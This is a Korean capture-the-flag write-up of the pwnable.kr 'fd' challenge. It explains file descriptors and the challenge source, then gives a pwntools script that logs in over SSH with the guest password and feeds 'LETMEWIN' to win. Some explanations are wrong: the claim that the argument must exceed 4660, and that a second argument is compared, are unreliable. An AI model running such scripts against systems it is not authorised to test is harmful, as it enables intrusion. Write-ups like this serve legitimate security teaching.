`File Descriptor`
#
파일 디스크립터는 c Integer 로 표시되며 3가지 유형의 파일 디스크립터가 있습니다.
- standard input( stdin) , 정수 값은 0
- standard output( stdout) , 해당 정수 값은 1
- standard error( stderr)이고 정수 값은 2

![image](https://user-images.githubusercontent.com/61821641/150593700-c678782e-1b66-4a45-9875-3dc4107853bd.png)

![image](https://user-images.githubusercontent.com/61821641/150593798-db39f1ba-8d50-4429-84b1-61701fa72972.png)

![image](https://user-images.githubusercontent.com/61821641/150593842-66a43343-2861-4753-b074-50ce833f31a1.png)

```
if(argc<2){
                printf("pass argv[1] a number\n");
                return 0;
```
여기서 arg 수를 검사한다.
```
int fd = atoi( argv[1] ) - 0x1234;
```
argv[1]의 atoi(Ascii to Integer) - 0x1234

![image](https://user-images.githubusercontent.com/61821641/150594275-837f097f-7b1e-4811-b547-da8b51504aed.png)

argv[1]은 int(정수)이므로 4660보다 커야한다.

```
if(!strcmp("LETMEWIN\n", buf)){
```
두번째 인수값을 "LETMEWIN" 문자열과 비교한다.

![image](https://user-images.githubusercontent.com/61821641/150595112-944e403c-6453-4b55-b8cc-3ad710a8e469.png)

최종 스크립트
```
#!/usr/bin/python

from pwn import *

shell = ssh('fd' ,'pwnable.kr' ,password='guest', port=2222)
process = shell.process(executable='./fd', argv=['fd','4660'])
process.sendline('LETMEWIN')
print process.recv()
```
```
./exploit.py
```
